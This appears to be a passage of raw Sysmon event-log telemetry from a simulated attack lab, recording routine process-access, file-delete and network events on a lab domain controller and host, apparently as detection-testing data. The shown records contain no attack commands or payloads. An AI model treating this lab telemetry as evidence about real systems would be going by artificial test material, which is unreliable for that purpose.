Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B45BCE9AD12D1958698237795C590B8,SHA256=A96B7DE3707927017051B8FE8B4A08EFBC0F2C9549269876E800648F4193F648,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.457{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.457{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-0F2C-6216-C204-000000003802}2228C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000216250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:42.689{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51316-false10.0.1.12-8000- 23542300x8000000000000000287334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:46.848{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAB369D090736550F56B8FCCF6C647B0,SHA256=ED0104F7D8B86A007A398EF6C5C70B2C23F0F85CD8C844C5CDD07F0778E4C8C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.451{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83AED4472F969B1B03905284DA036267,SHA256=657495085EA22E5B4D651F11924818E50C491AAE01BE8CD388E468104120246B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.451{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E760784339DAE3A166549C90EC1C5200,SHA256=766B5533FA51CE4CACF39655484C94BA6D04D3B3524BAF9D4BCB9AEBD940AB7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.451{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E2508F4B9BBF97C796750CE994C9C58,SHA256=945B1505CA87945B4F61EAE13CD316DF329B2C9A3CEFC34FB4112BD3B1604787,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:46.738{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:46.738{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:46.738{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:46.129{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-110E-6216-4A04-000000003902}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-110E-6216-4A04-000000003902}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.123{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-110E-6216-4A04-000000003902}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:46.124{4F8D34B0-110E-6216-4A04-000000003902}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:47.863{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6489482E94443CBB8FAC34C78E4AA1C0,SHA256=AD685D640194A1EC52D2983EEA4793117D21C117BF8592693CD83E82D74E5F38,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.576{4F8D34B0-110F-6216-4B04-000000003902}18603216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216296Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.482{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BB635A8AE5CDF2D111EEA099DEAF9AA,SHA256=8B32D0F7781262E8C9FA5FD86BE2D10C9ADC3681C801841D4E6AFECD30D939F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:47.754{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:47.754{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 